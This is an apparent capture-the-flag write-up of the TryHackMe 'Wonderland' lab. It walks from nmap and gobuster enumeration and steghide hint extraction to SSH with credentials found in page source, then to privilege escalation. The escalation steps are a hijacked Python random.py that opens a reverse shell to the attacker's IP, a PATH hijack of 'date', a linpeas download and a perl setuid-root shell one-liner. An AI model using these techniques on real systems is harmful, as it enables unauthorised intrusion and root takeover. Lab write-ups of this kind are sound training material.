TryHackMe - Wonderland
Nmap
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/31%OT=22%CT=1%CU=39160%PV=Y%DS=4%DC=I%G=Y%TM=6245C38
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M506ST11NW7%O2=M506ST11NW7%O3=M506NNT11NW7%O4=M506ST11NW7%O5=M506ST1
OS:1NW7%O6=M506ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN
OS:(R=Y%DF=Y%T=40%W=F507%O=M506NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 729.87 secondsPort 80
Let's run Gobuster
┌──(root💀kali)-[~]
└─# gobuster dir -u http://10.10.229.155/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.229.155/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/31 11:22:01 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 0] [--> img/]
/poem (Status: 301) [Size: 0] [--> poem/]
/r (Status: 301) [Size: 0] [--> r/]
===============================================================
2022/03/31 11:31:29 Finished
===============================================================On /poem we have The Jabberwocky poem
On /r we have nothing interesting
On /img there are some images
Let's modify our /etc/hosts and add this
10.10.95.114 wonderlandNow we can use gobuster for subdomain enumeration as well (it does not five anything but it was worth a try)
Let's have a closer look to the images.
First lets take the rabbit one As it is written pretty much everywhere to follow the white rabbit.
┌──(root💀kali)-[~/Documents/tryhackme/wonderland]
└─# steghide --info white_rabbit_1.jpg
"white_rabbit_1.jpg":
format: jpeg
capacity: 99.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "hint.txt":
size: 22.0 Byte
encrypted: rijndael-128, cbc
compressed: yesIt asks for a passphrase but there is no need to enter anything you can just type enter.
And we can see that a hint is embeded in the image, lets extract it
steghide --extract -sf white_rabbit_1.jpgsf will specify it is a stego file.Here is the hint
┌──(root💀kali)-[~/Documents/tryhackme/wonderland]
└─# cat hint.txt
follow the r a b b i t In our gobuster there was an r directory. So this probably means that r a b b i t is a path that we need to follow
Indeed at each page we get the follow up fo the story
http://wonderland/r/a/b/b/i/t/
If we look at the code of the last page we get what seems to be user:pass:
alice:HowDothTheLittleCrocodileImproveHisShiningTailLet's try those on the ssh. It works:
alice@wonderland:~$ If we check the hint for the user.txt it says everything is upside down so I tried to find a file called
txt.resubut it was not it, then I realized as we have the root.txt in alice's folder maybe the user.txt is in a the root so I tried acat /root/user.txtAnd it worked!
Let's try to become root
Privilege Escalation
If we sudo -l using alice password, we get htis
alice@wonderland:~$ sudo -l
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pyIf we l0ok at the python script it seems to show 10 of any sentence of the poem randomly
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)Having the right to this specific file means that this the way to privesc.
It seems like we could hijack the python library. I found this really interesintg article that explains it pretty well
So our walrus script uses the library random.py. I modified it like this to get a reverse shell and I launched it as the user rabbit this way:
sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.13.22.56",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])And it works we have a shell as rabbit:
With a shell as rabbit we can now have a look at their home folder and we can see this file called teaParty. If we use file on it we get this result:
file teaParty
teaParty: setuid, setgid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=75a832557e341d3f65157c22fafd6d6ed7413474, not strippedIf we launch it it ends with a segfault
Probably by Thu, 31 Mar 2022 23:15:41 +0000
Welcome to the tea party!
The Mad Hatter will be here soon.
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)Let's take a look at it from our attacking machine as we do not have a the strings function in the target machine
we can serve it using http server of python as it is installed in the machine
python3.6 -m http.server 8888And we take it using wget
When we look at it with strings we see this line:
/bin/echo -n 'Probably by ' && date --date='next hour' -RSo date is invoked without using the full path, we could certainly abuse this by putting a file called date and make it do something for us.
Let's just make it run bash using
/bin/bash
Now we serve it from our attacking machine with python and get it in our target
We have to make it executable with
chmod +xAnd we need to export rabbit's home as our path
export PATH=/home/rabbit:$PATH
echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binAnd now we can run our binary! And it works
We are the mad hatter!! If we go to his home directory we get his password
WhyIsARavenLikeAWritingDesk?so we can connect as him using ssh:
There are no specific file that caught our attention and sudo -l does not list anything so let's get linepeas and check out what we could do.
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64we run this in our attacking machineWe serve it using python server
python3 -m http.server 80We dowload it in our target
wget http://10.13.22.56/linpeas_linux_amd64add it execution right with
chmod +xand run it ./linpeas_linux_amd64We have a 95% PE vector:
This article shows us a way to abuse this I slightly modified the command to use bash instead of sh
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'and it works!
We are root and can read our last flag on alice's home!
Last updated